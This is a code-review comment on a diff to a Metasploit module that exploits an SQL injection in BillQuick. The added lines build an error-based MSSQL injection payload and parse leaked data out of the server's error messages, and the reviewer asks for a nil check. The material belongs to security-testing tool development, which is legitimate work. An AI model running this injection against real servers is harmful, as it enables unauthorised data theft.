modules/auxiliary/gather/billquick_txtid_sqli.rb

```diff
@@ -140,24 +133,23 @@ def run
     }
     report_service(service)
 
+    sqli = create_sqli(dbms: Msf::Exploit::SQLi::Mssqli::Common, opts: { safe: true, encoder: { encode: "'#{header}'+^DATA^+'#{footer}'", decode: ->(x) { x[/#{header}(.+?)#{footer}/mi, 1] } } }) do |payload|
+      int = Rex::Text.rand_text_numeric(4)
+      res = inject("'+(select '' where #{int} in (#{payload}))+'", viewstate, viewstategenerator, eventvalidation)
+      error_info(res)[/\\u0027(.+?)\\u0027/m, 1]
```

Comment:
`error_info()` can return `nil`, so validate the return value before accessing its contents.